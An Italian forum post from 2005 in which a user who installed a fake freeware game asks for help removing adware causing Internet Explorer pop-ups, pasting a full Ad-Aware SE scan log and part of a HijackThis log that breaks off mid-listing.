|
|||||||
|
|
|
 |
|
|
Strumenti |
30-05-2005, 19:13
|
#1 |
|
Member
Iscritto dal: Mar 2005
Messaggi: 142
|
Aiuto PopUp IE su http://e.rn11.com
SCUSATE LA LUNGHEZZA DEL POST MA SONO I LOG DI Ad-Aware e HijackThis
Salve a tutti, spero mi possiate aiutare, ho fatto una mega stupidata, mi hanno dato un file .exe dicendomi che era un gioco di strategia freeware sulla campagna napoleonica. Durante l'installazione sembra tutto normale con condizioni EULA e cose del genere ma mi lasciava perplesso per alcuni comportamenti durante l'installazione poi ho capito... mi sono beccato non so bene cosa!!  mi si aprono continuamente dei popUp di IE (uso Firefox 1.04) che a volte puntano all'indirizzo http://e.rn11.com. Mi sono trovato tre file BAT sulla root di C: DelUS.bat, winupd.bat, winupd2.bat (se volete ho anche il contenuto da mostrarvi) Inoltre un file Italy.EXE con relativo icona di lancio (C:\Windows\Sysyem32\\Italy.exe" -S). Infine mi sono trovato parecchie cosa nello scheduler Ho fatto partire l'antivirus di Zone Alarm ma non ho trovato niente poi con Ad-Aware trovo delle cose che continuamente ritrovo presenti anche dopo l'eliminazione (Vedi Log di Ad-Aware) Ad-Aware SE Build 1.06r1 Logfile Created on:lunedì 30 maggio 2005 19.53.02 Created with Ad-Aware SE Personal, free for private use. Using definitions file:SE1R47 24.05.2005 »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» References detected during the scan: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Ebates MoneyMaker(TAC index:4):10 total references MRU List(TAC index:0):8 total references Tracking Cookie(TAC index:3):1 total references »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Ad-Aware SE Settings =========================== Set : Search for negligible risk entries Set : Safe mode (always request confirmation) Set : Scan active processes Set : Scan registry Set : Deep-scan registry Set : Scan my IE Favorites for banned URLs Set : Scan my Hosts file Extended Ad-Aware SE Settings =========================== Set : Unload recognized processes & modules during scan Set : Scan registry for all users instead of current user only Set : Always try to unload modules before deletion Set : During removal, unload Explorer and IE if necessary Set : Let Windows remove files in use at next reboot Set : Delete quarantined objects after restoring Set : Include basic Ad-Aware settings in log file Set : Include additional Ad-Aware settings in log file Set : Include reference summary in log file Set : Include alternate data stream details in log file Set : Play sound at scan completion if scan locates critical objects 30-05-2005 19.53.02 - Scan started. (Smart mode) Listing running processes »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» #:1 [smss.exe] FilePath : \SystemRoot\System32\ ProcessID : 492 ThreadCreationTime : 30-05-2005 17.45.50 BasePriority : Normal #:2 [csrss.exe] FilePath : \??\C:\WINDOWS\system32\ ProcessID : 976 ThreadCreationTime : 30-05-2005 17.45.56 BasePriority : Normal #:3 [winlogon.exe] FilePath : \??\C:\WINDOWS\system32\ ProcessID : 1004 ThreadCreationTime : 30-05-2005 17.45.58 BasePriority : High #:4 [services.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1048 ThreadCreationTime : 30-05-2005 17.46.01 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Sistema operativo Microsoft® Windows® CompanyName : Microsoft Corporation FileDescription : Applicazione Servizi e Controller InternalName : services.exe LegalCopyright : © Microsoft Corporation. Tutti i diritti riservati. OriginalFilename : services.exe #:5 [lsass.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1060 ThreadCreationTime : 30-05-2005 17.46.01 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : LSA Shell (Export Version) InternalName : lsass.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : lsass.exe #:6 [svchost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1212 ThreadCreationTime : 30-05-2005 17.46.04 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:7 [svchost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1292 ThreadCreationTime : 30-05-2005 17.46.05 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:8 [svchost.exe] FilePath : C:\WINDOWS\System32\ ProcessID : 1348 ThreadCreationTime : 30-05-2005 17.46.06 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:9 [svchost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1408 ThreadCreationTime : 30-05-2005 17.46.06 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:10 [svchost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1520 ThreadCreationTime : 30-05-2005 17.46.07 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:11 [spoolsv.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1736 ThreadCreationTime : 30-05-2005 17.46.11 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Spooler SubSystem App InternalName : spoolsv.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : spoolsv.exe #:12 [photoshopelementsfileagent.exe] FilePath : D:\Programmi\Adobe\Photoshop Elements 3.0\ ProcessID : 1840 ThreadCreationTime : 30-05-2005 17.46.12 BasePriority : Normal #:13 [wrapper.exe] FilePath : D:\Programmi\Alias\Maya6.0\docs\ ProcessID : 1872 ThreadCreationTime : 30-05-2005 17.46.13 BasePriority : Normal #:14 [atkkbservice.exe] FilePath : C:\WINDOWS\ ProcessID : 1884 ThreadCreationTime : 30-05-2005 17.46.13 BasePriority : Normal FileVersion : 1, 0, 0, 0 ProductVersion : 1, 0, 0, 0 ProductName : ASUS Keyboard Service CompanyName : ASUSTeK COMPUTER INC. FileDescription : ASUS Keyboard Service InternalName : ATKKBService LegalCopyright : Copyright (C) 2004 @ASUSTeK COMPUTER INC. OriginalFilename : ATKKBService.exe #:15 [adskscsrv.exe] FilePath : C:\Programmi\File comuni\Autodesk Shared\Service\ ProcessID : 1896 ThreadCreationTime : 30-05-2005 17.46.13 BasePriority : Normal FileVersion : 2.51.000 FileDescription : System Level Service Utility #:16 [isafe.exe] FilePath : C:\WINDOWS\system32\ZoneLabs\ ProcessID : 1924 ThreadCreationTime : 30-05-2005 17.46.13 BasePriority : Normal FileVersion : Version 10.65.0.7 ProductVersion : Version 10.65.0.7 ProductName : ISafe CompanyName : Computer Associates International, Inc. FileDescription : ISafe Service InternalName : ISafe LegalCopyright : © 2003 Computer Associates International, Inc. LegalTrademarks : Vet is a trademark of Computer Associates International, Inc. OriginalFilename : ISafe.exe Comments : ISafe #:17 [ehrecvr.exe] FilePath : C:\WINDOWS\eHome\ ProcessID : 1944 ThreadCreationTime : 30-05-2005 17.46.13 BasePriority : Above Normal FileVersion : 5.1.2700.2180 (private/xpsp_mce.040810-0205) ProductVersion : 5.1.2700.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Media Center Receiver Service InternalName : ehRecvr LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : ehRecvr.exe #:18 [java.exe] FilePath : D:\Programmi\Alias\Maya6.0\docs\jre\bin\ ProcessID : 1964 ThreadCreationTime : 30-05-2005 17.46.14 BasePriority : Normal #:19 [ehsched.exe] FilePath : C:\WINDOWS\eHome\ ProcessID : 1960 ThreadCreationTime : 30-05-2005 17.46.14 BasePriority : Normal FileVersion : 5.1.2700.2180 (private/xpsp_mce.040810-0205) ProductVersion : 5.1.2700.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Media Center Scheduler Service InternalName : ehSched LegalCopyright : © Microsoft Corporation. Tutti i diritti riservati. OriginalFilename : ehSched.exe #:20 [mdm.exe] FilePath : C:\Programmi\File comuni\Microsoft Shared\VS7DEBUG\ ProcessID : 148 ThreadCreationTime : 30-05-2005 17.46.17 BasePriority : Normal FileVersion : 7.00.9466 ProductVersion : 7.00.9466 ProductName : Microsoft® Visual Studio .NET CompanyName : Microsoft Corporation FileDescription : Machine Debug Manager InternalName : mdm.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : mdm.exe #:21 [nvsvc32.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 228 ThreadCreationTime : 30-05-2005 17.46.18 BasePriority : Normal FileVersion : 6.14.10.7184 ProductVersion : 6.14.10.7184 ProductName : NVIDIA Driver Helper Service, Version 71.84 CompanyName : NVIDIA Corporation FileDescription : NVIDIA Driver Helper Service, Version 71.84 InternalName : NVSVC LegalCopyright : (C) NVIDIA Corporation. All rights reserved. OriginalFilename : nvsvc32.exe #:22 [photoshopelementsdeviceconnect.exe] FilePath : D:\Programmi\Adobe\Photoshop Elements 3.0\ ProcessID : 240 ThreadCreationTime : 30-05-2005 17.46.19 BasePriority : Normal #:23 [svchost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 344 ThreadCreationTime : 30-05-2005 17.46.20 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Generic Host Process for Win32 Services InternalName : svchost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : svchost.exe #:24 [ulcdrsvr.exe] FilePath : C:\Programmi\File comuni\Ulead Systems\DVD\ ProcessID : 380 ThreadCreationTime : 30-05-2005 17.46.21 BasePriority : Normal FileVersion : 1, 0, 0, 3 ProductVersion : 1, 0, 0, 3 ProductName : Ulead Systems ULCDRSvr CompanyName : Ulead Systems, Inc. FileDescription : ULCDRSvr InternalName : ULCDRSvr LegalCopyright : Copyright © 2002 Ulead Systems, Inc. OriginalFilename : ULCDRSvr.exe #:25 [vsmon.exe] FilePath : C:\WINDOWS\system32\ZoneLabs\ ProcessID : 468 ThreadCreationTime : 30-05-2005 17.46.22 BasePriority : Normal FileVersion : 5.5.094.000 ProductVersion : 5.5.094.000 ProductName : TrueVector Service CompanyName : Zone Labs, LLC FileDescription : TrueVector Service InternalName : vsmon LegalCopyright : Copyright © 1998-2005, Zone Labs, LLC OriginalFilename : vsmon.exe #:26 [dllhost.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 1640 ThreadCreationTime : 30-05-2005 17.46.58 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : COM Surrogate InternalName : dllhost.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : dllhost.exe #:27 [alg.exe] FilePath : C:\WINDOWS\System32\ ProcessID : 2076 ThreadCreationTime : 30-05-2005 17.46.59 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : Application Layer Gateway Service InternalName : ALG.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : ALG.exe #:28 [sdmcp.exe] FilePath : C:\Programmi\File comuni\Stardock\ ProcessID : 2448 ThreadCreationTime : 30-05-2005 17.47.33 BasePriority : Normal FileVersion : 0, 0, 5, 9 ProductVersion : 0, 0, 5, 9 ProductName : Stardock MCP Core Services (System Extensions and Hooks) CompanyName : Stardock FileDescription : MCPServer InternalName : MCP LegalCopyright : Copyright © 2005 OriginalFilename : SDMCP.exe #:29 [explorer.exe] FilePath : C:\WINDOWS\ ProcessID : 2704 ThreadCreationTime : 30-05-2005 17.47.37 BasePriority : Normal FileVersion : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 6.00.2900.2180 ProductName : Sistema operativo Microsoft® Windows® CompanyName : Microsoft Corporation FileDescription : Esplora risorse InternalName : explorer LegalCopyright : © Microsoft Corporation. Tutti i diritti riservati. OriginalFilename : EXPLORER.EXE #:30 [zlclient.exe] FilePath : C:\Programmi\Zone Labs\ZoneAlarm\ ProcessID : 2828 ThreadCreationTime : 30-05-2005 17.47.52 BasePriority : Normal FileVersion : 5.5.094.000 ProductVersion : 5.5.094.000 ProductName : Zone Labs Client CompanyName : Zone Labs, LLC FileDescription : Zone Labs Client InternalName : zlclient LegalCopyright : Copyright © 1998-2005, Zone Labs, LLC OriginalFilename : zlclient.exe #:31 [jusched.exe] FilePath : C:\Programmi\Java\j2re1.4.2_05\bin\ ProcessID : 2836 ThreadCreationTime : 30-05-2005 17.47.53 BasePriority : Normal #:32 [swtrayv4.exe] FilePath : C:\PROGRA~1\MI948F~1\GAMECO~1\Common\ ProcessID : 2908 ThreadCreationTime : 30-05-2005 17.47.54 BasePriority : Normal FileVersion : 4.03.253 ProductVersion : 4.03.253 ProductName : Microsoft Game Controller Software CompanyName : Microsoft Corporation FileDescription : MS SideWinder Tray Application InternalName : MS SideWinder Tray Application LegalCopyright : Copyright © 1995-1999 Microsoft Corporation OriginalFilename : SWTRAYV4.EXE #:33 [wkufind.exe] FilePath : C:\Programmi\File comuni\Microsoft Shared\Works Shared\ ProcessID : 2984 ThreadCreationTime : 30-05-2005 17.47.55 BasePriority : Normal FileVersion : 7.00.0617.0 ProductVersion : 7.00.0617.0 ProductName : Update Detection Module CompanyName : Microsoft® Corporation FileDescription : Rilevamento aggiornamenti di Microsoft® Works InternalName : WkUFind LegalCopyright : Copyright © 1987-2002 Microsoft Corporation. OriginalFilename : WkUFind.exe #:34 [qttask.exe] FilePath : C:\Programmi\QuickTime\ ProcessID : 3012 ThreadCreationTime : 30-05-2005 17.47.56 BasePriority : Normal FileVersion : 6.5.1 ProductVersion : QuickTime 6.5.1 ProductName : QuickTime CompanyName : Apple Computer, Inc. InternalName : QuickTime Task LegalCopyright : © Apple Computer, Inc. 2001-2004 OriginalFilename : QTTask.exe #:35 [ituneshelper.exe] FilePath : C:\Programmi\iTunes\ ProcessID : 3020 ThreadCreationTime : 30-05-2005 17.47.57 BasePriority : Normal FileVersion : 4.8.0.31 ProductVersion : 4.8.0.31 ProductName : iTunes CompanyName : Apple Computer, Inc. FileDescription : iTunesHelper Module InternalName : iTunesHelper LegalCopyright : © 2003-2005 Apple Computer, Inc. All Rights Reserved. OriginalFilename : iTunesHelper.exe #:36 [realsched.exe] FilePath : C:\Programmi\File comuni\Real\Update_OB\ ProcessID : 3036 ThreadCreationTime : 30-05-2005 17.47.57 BasePriority : Normal FileVersion : 0.1.0.3208 ProductVersion : 0.1.0.3208 ProductName : RealPlayer (32-bit) CompanyName : RealNetworks, Inc. FileDescription : RealNetworks Scheduler InternalName : schedapp LegalCopyright : Copyright © RealNetworks, Inc. 1995-2004 LegalTrademarks : RealAudio(tm) is a trademark of RealNetworks, Inc. OriginalFilename : realsched.exe #:37 [ipodservice.exe] FilePath : C:\Programmi\iPod\bin\ ProcessID : 3064 ThreadCreationTime : 30-05-2005 17.47.57 BasePriority : Normal FileVersion : 4.8.0.31 ProductVersion : 4.8.0.31 ProductName : iTunes CompanyName : Apple Computer, Inc. FileDescription : iPodService Module InternalName : iPodService LegalCopyright : © 2003-2005 Apple Computer, Inc. All Rights Reserved. OriginalFilename : iPodService.exe #:38 [ctfmon.exe] FilePath : C:\WINDOWS\system32\ ProcessID : 3092 ThreadCreationTime : 30-05-2005 17.47.58 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : CTF Loader InternalName : CTFMON LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : CTFMON.EXE #:39 [msmsgs.exe] FilePath : C:\Programmi\Messenger\ ProcessID : 3144 ThreadCreationTime : 30-05-2005 17.47.58 BasePriority : Normal FileVersion : 4.7.3001 ProductVersion : Version 4.7.3001 ProductName : Messenger CompanyName : Microsoft Corporation FileDescription : Windows Messenger InternalName : msmsgs LegalCopyright : Copyright (c) Microsoft Corporation 2004 LegalTrademarks : Microsoft(R) is a registered trademark of Microsoft Corporation in the U.S. and/or other countries. OriginalFilename : msmsgs.exe #:40 [copernicdesktopsearch.exe] FilePath : C:\Programmi\Copernic Desktop Search\ ProcessID : 3168 ThreadCreationTime : 30-05-2005 17.47.58 BasePriority : Normal #:41 [kem.exe] FilePath : C:\Programmi\Logitech\SetPoint\ ProcessID : 3220 ThreadCreationTime : 30-05-2005 17.48.02 BasePriority : Normal FileVersion : 2.14.106 ProductVersion : 2.14.106 ProductName : SetPoint Files CompanyName : Logitech Inc. FileDescription : Logitech SetPoint InternalName : SetPoint LegalCopyright : (C) 2003 Logitech. All rights reserved. LegalTrademarks : Logitech®, is a registered trademark of Logitech Inc. OriginalFilename : KEM.exe Comments : Created by the Productivity Software team #:42 [khalmnpr.exe] FilePath : C:\Programmi\Logitech\SetPoint\ ProcessID : 3268 ThreadCreationTime : 30-05-2005 17.48.06 BasePriority : Normal FileVersion : 2.14.103 ProductVersion : 2.14.103 ProductName : Productivity Software Common Files CompanyName : Logitech Inc. FileDescription : Logitech Hardware Abstraction Layer InternalName : SetPoint LegalCopyright : (C) 2003 Logitech. All rights reserved. LegalTrademarks : Logitech®, MouseWare® and iTouch® are registered trademarks of Logitech Inc. OriginalFilename : KHALMNPR.Exe Comments : Created by the Productivity Software team #:43 [mantispm.exe] FilePath : C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\ ProcessID : 3416 ThreadCreationTime : 30-05-2005 17.48.22 BasePriority : Normal FileVersion : 4, 2, 1, 2891 ProductVersion : 4, 2, 1, 2891 FileDescription : Spam Filter InternalName : mantispm.exe LegalCopyright : (c) 2002-2004 OriginalFilename : mantispm.exe #:44 [iexplore.exe] FilePath : C:\Programmi\Internet Explorer\ ProcessID : 3580 ThreadCreationTime : 30-05-2005 17.49.20 BasePriority : Normal FileVersion : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 6.00.2900.2180 ProductName : Sistema operativo Microsoft® Windows® CompanyName : Microsoft Corporation FileDescription : Internet Explorer InternalName : iexplore LegalCopyright : © Microsoft Corporation. Tutti i diritti riservati. OriginalFilename : IEXPLORE.EXE #:45 [wmiprvse.exe] FilePath : C:\WINDOWS\system32\wbem\ ProcessID : 3728 ThreadCreationTime : 30-05-2005 17.50.44 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : WMI InternalName : Wmiprvse.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : Wmiprvse.exe #:46 [wmiprvse.exe] FilePath : C:\WINDOWS\system32\wbem\ ProcessID : 3972 ThreadCreationTime : 30-05-2005 17.51.53 BasePriority : Normal FileVersion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158) ProductVersion : 5.1.2600.2180 ProductName : Microsoft® Windows® Operating System CompanyName : Microsoft Corporation FileDescription : WMI InternalName : Wmiprvse.exe LegalCopyright : © Microsoft Corporation. All rights reserved. OriginalFilename : Wmiprvse.exe #:47 [ad-aware.exe] FilePath : C:\Programmi\Lavasoft\Ad-Aware SE Personal\ ProcessID : 2236 ThreadCreationTime : 30-05-2005 17.52.54 BasePriority : Normal FileVersion : 6.2.0.236 ProductVersion : SE 106 ProductName : Lavasoft Ad-Aware SE CompanyName : Lavasoft Sweden FileDescription : Ad-Aware SE Core application InternalName : Ad-Aware.exe LegalCopyright : Copyright © Lavasoft AB Sweden OriginalFilename : Ad-Aware.exe Comments : All Rights Reserved Memory scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 0 Objects found so far: 0 Started registry scan »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : "AC" Rootkey : HKEY_USERS Object : S-1-5-21-73586283-602162358-839522115-1003\software\lq Value : AC Registry Scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 1 Objects found so far: 1 Started deep registry scan »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Deep registry scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 0 Objects found so far: 1 Started Tracking Cookie scan »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Tracking Cookie Object Recognized! Type : IECache Entry Data : fabio@revenue[2].txt TAC Rating : 3 Category : Data Miner Comment : Hits:14 Value : Cookie:fabio@revenue.net/ Expires : 10-06-2022 7.05.42 LastSync : Hits:14 UseCount : 0 Hits : 14 Tracking cookie scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 1 Objects found so far: 2 Deep scanning and examining files... »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Disk Scan Result for C:\WINDOWS »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 0 Objects found so far: 2 Disk Scan Result for C:\WINDOWS\system32 »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 0 Objects found so far: 2 Disk Scan Result for C:\DOCUME~1\Fabio\IMPOST~1\Temp\ »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 0 Objects found so far: 2 Scanning Hosts file...... Hosts file location:"C:\WINDOWS\system32\drivers\etc\hosts". »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Hosts file scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» 1 entries scanned. New critical objects:0 Objects found so far: 2 MRU List Object Recognized! Location: : C:\Documents and Settings\Fabio\recent Description : list of recently opened documents MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\microsoft\direct3d\mostrecentapplication Description : most recent application to use microsoft direct3d MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\microsoft\direct3d\mostrecentapplication Description : most recent application to use microsoft direct X MRU List Object Recognized! Location: : software\microsoft\directdraw\mostrecentapplication Description : most recent application to use microsoft directdraw MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\microsoft\directinput\mostrecentapplication Description : most recent application to use microsoft directinput MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\microsoft\directinput\mostrecentapplication Description : most recent application to use microsoft directinput MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\microsoft\windows\currentversion\explorer\recentdocs Description : list of recent documents opened MRU List Object Recognized! Location: : S-1-5-21-73586283-602162358-839522115-1003\software\nico mak computing\winzip\filemenu Description : winzip recently used archives Performing conditional scans... »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Ebates MoneyMaker Object Recognized! Type : Regkey Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : AT Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : AD Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : AM Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : LTH Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : LTL Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : AC Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : U Ebates MoneyMaker Object Recognized! Type : RegValue Data : TAC Rating : 4 Category : Data Miner Comment : Rootkey : HKEY_CURRENT_USER Object : software\lq Value : I Conditional scan result: »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» New critical objects: 9 Objects found so far: 19 19.55.54 Scan Complete Summary Of This Scan »»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»»» Total scanning time:00.02.52.469 Objects scanned:81081 Objects identified:11 Objects ignored:0 New critical objects:11 Infine allego Log di HijackThis Logfile of HijackThis v1.99.1 Scan saved at 19.53.29, on 30/05/2005 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe D:\Programmi\Adobe\Photoshop Elements 3.0\PhotoshopElementsFileAgent.exe D:\Programmi\Alias\Maya6.0\docs\Wrapper.exe C:\WINDOWS\ATKKBService.exe C:\Programmi\File comuni\Autodesk Shared\Service\AdskScSrv.exe C:\WINDOWS\system32\ZoneLabs\isafe.exe C:\WINDOWS\eHome\ehRecvr.exe D:\Programmi\Alias\Maya6.0\docs\jre\bin\java.exe C:\WINDOWS\eHome\ehSched.exe C:\Programmi\File comuni\Microsoft Shared\VS7DEBUG\MDM.EXE C:\WINDOWS\system32\nvsvc32.exe D:\Programmi\Adobe\Photoshop Elements 3.0\PhotoshopElementsDeviceConnect.exe C:\WINDOWS\system32\svchost.exe C:\Programmi\File comuni\Ulead Systems\DVD\ULCDRSvr.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\system32\dllhost.exe C:\Programmi\File comuni\Stardock\SDMCP.exe C:\WINDOWS\Explorer.EXE C:\Programmi\Zone Labs\ZoneAlarm\zlclient.exe C:\Programmi\Java\j2re1.4.2_05\bin\jusched.exe C:\PROGRA~1\MI948F~1\GAMECO~1\Common\SWTrayV4.exe C:\Programmi\File comuni\Microsoft Shared\Works Shared\WkUFind.exe C:\Programmi\QuickTime\qttask.exe C:\Programmi\iTunes\iTunesHelper.exe C:\Programmi\File comuni\Real\Update_OB\realsched.exe C:\Programmi\iPod\bin\iPodService.exe C:\WINDOWS\system32\ctfmon.exe C:\Programmi\Messenger\msmsgs.exe C:\Programmi\Copernic Desktop Search\CopernicDesktopSearch.exe C:\Programmi\Logitech\SetPoint\KEM.exe C:\Programmi\Logitech\SetPoint\KHALMNPR.EXE C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe C:\Programmi\Internet Explorer\iexplore.exe C:\Programmi\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe C:\Documents and Settings\Fabio\Desktop\Applicazioni\HijackThis.exe R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.it/ O4 - HKLM\..\Run: [Zone Labs Client] C:\Programmi\Zone Labs\ZoneAlarm\zlclient.exe O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programmi\Java\j2re1.4.2_05\bin\jusched.exe O4 - HKLM\..\Run: [SideWinderTrayV4] C:\PROGRA~1\MI948F~1\GAMECO~1\Common\SWTrayV4.exe O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Programmi\File comuni\Microsoft Shared\Works Shared\WkUFind.exe O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvMediaCenter] RunDLL32.exe NvMCTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime O4 - 